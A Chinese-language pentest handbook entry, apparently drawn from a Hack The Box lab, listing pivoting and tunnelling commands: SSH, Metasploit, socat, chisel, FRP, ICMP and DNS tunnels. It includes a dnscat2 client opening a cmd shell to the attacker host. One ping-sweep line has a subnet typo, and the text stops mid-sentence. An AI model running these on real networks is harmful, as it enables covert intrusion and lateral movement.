作者的掏心话
该系列名为 渗透测试-XXXX
该系列都是比较基础的内容,如各位没找到自己想要的内容,小编给各位赔不是了。
该系列是以俺日常学习笔记为数据基础,所整理出来的使用手册。该系列希望能够做到成为渗透测试时的帮助手册,提醒渗透的思路、渗透工具的具体使用等内容,以免各位在互联网再不断翻找。由于互联网的内容良莠不齐,俺可保证收集到的内容均经过验证,所以请放心食用。
ssh 搭建socks5代理
ssh -D 1080 -f user@10.129.x.x -N
ssh 正向端口转发
ssh -L 4444:localhost:3306 user@10.129.x.x
设置多个端口转发
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64
ssh反向端口转发
ssh -R <中间者IP>:8080:0.0.0.0:8000 ubuntu@<中间这IP> -vN
proxychains代理攻击机工具
proxychains nmap -sT -sV -sC -Pn 10.10.1.17
代理主机cmd探测其他网段
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
代理主机powershell探测其他网段
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}
msf搭建代理
msf6 > use auxiliary/server/socks_proxy
查看msf代理情况
msf6 auxiliary(server/socks_proxy) > jobs
msf 进行网段存活扫描
post/multi/gather/ping_sweep
msf创建代理路由
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
meterpreter > run autoroute -s 172.16.5.0/23
msf展示路由表
meterpreter > run autoroute -p
msf端口转发选项表
meterpreter > help portfwd
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
-R Indicates a reverse port forward.
msf创建正向端口转发
创建本地3300端口 --> 远程主机 172.16.5.19的3389端口的道路
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
msf创建反向端口转发
创建shell主机的1234端口 --> 10.10.14.18的8081端口
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
socat 端口转发
socat将本地的8080端口流量 -->发送给10.10.14.18:80
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
socat将8080端口流量 --> 发给172.16.5.19
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
plink 工具让我们在Windows使用ssh
plink -ssh -D 9050 ubuntu@10.129.15.50
sshuttle -r username@remote_host --ssh-cmd 'ssh -i /path/to/private/key' 0.0.0.0/0
sshuttle工具创建枢纽
sshuttle可以说是最方便的工具了,但是我们有必要了解他的原理,因为如果使用不当他可能会对我们的系统造成伤害。sshuttle是结合ssh和iptables来完成的透明代理工具,iptables控制者网络的转发情况,而sshuttle会对iptables进行调整,所以使用的时候请确保sshuttle工具不会干死咱们得iptables。
通过中继机器10.129.202.64创建动态端口转发,转发送往172.16.5.0/23的流量。
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
sshuttle工具通过id_rsa创建枢纽
sshuttle -r username@remote_host --ssh-cmd 'ssh -i /path/to/private/key' 0.0.0.0/0
FRP开启穿透代理
开启frpc
./frpc -c frpc.ini
开启frps
./frps -c frps.ini
frpc.ini
[common]
server_addr = 10.10.16.233
server_port = 7000
[socks5]
type = tcp
local_ip = 127.0.0.1 # 本地 SOCKS5 服务 IP
local_port = 1080 # 本地监听的 SOCKS5 端口
remote_port = 7080 # 暴露在服务器端的端口
plugin = socks5
frps.ini
[common]
bind_port = 7000
dashboard_port = 7500
netsh.exe在Windows主机开启隧道
C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\Windows\system32> netsh.exe interface portproxy show v4tov4
Listen on ipv4: Connect to ipv4:
Address Port Address Port
--------------- ---------- --------------- ----------
10.129.42.198 8080 172.16.5.25 3389
dnscat2搭建dns隧道服务器
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
linux dnscat2客户端开启dns隧道
./dnscat --secret=0ec04a91cd1e963f8c03ca499d589d21 inlanefreight.local
powershell dnscat2客户端开启dns隧道
PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
Chisel搭建动态端口转发socks5服务器
在受害机器开启1234端口作为socks5服务
./chisel server -v -p 1234 --socks5
在攻击机链接1234端口获取本地代理为1080
./chisel client -v 10.129.202.64:1234 socks
2022/05/05 14:21:18 client: Connecting to ws://10.129.202.64:1234
2022/05/05 14:21:18 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2022/05/05 14:21:18 client: tun: Bound proxies
2022/05/05 14:21:19 client: Handshaking...
2022/05/05 14:21:19 client: Sending config
2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)
2022/05/05 14:21:19 client: tun: SSH connected
chisel搭建动态端口转发socks5服务器(反向)
攻击机监听1234端口,等待chiselclient链接穿件动态端口转发
sudo ./chisel server --reverse -v -p 1234 --socks5
受害机链接攻击机的1234端口,并使用反向代理开启功能
./chisel client -v 10.10.14.17:1234 R:socks
ptunnel-ng搭建端口转发服务器
受害机开启端口转发服务,将10.129.202.64的22端口准备开启转发
sudo ./ptunnel-ng -r10.129.202.64 -R22
攻击机链接ptunnel-ng服务器,并将转发流量端口绑定于攻击机2222端口
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
ptunnel-ng隐藏流量为ICMP
将端口转发流量走绑定与ping隧道的2222端口
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
SocksOverRDP搭建Windows动态端口转发代理
C:\Users\htb-student\Desktop\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
接着使用mstsc.exe访问远程主机,这里相当于在本机开启了服务器
接着将SocksOverRDP-server发送到远程主机,然后运行它
那么本机上面的1080端口就开启成功了
C:\Users\htb-student\Desktop\SocksOverRDP-x64> netstat -antb | findstr 1080
TCP 127.0.0.1:1080 0.0.0.0:0 LISTENING
Windows挂代理
使用Proxifier就可以了,这里就不多讲这个了,我相信各位肯定会用。
提升RDP远程性能
如果用起来不舒服,那就使用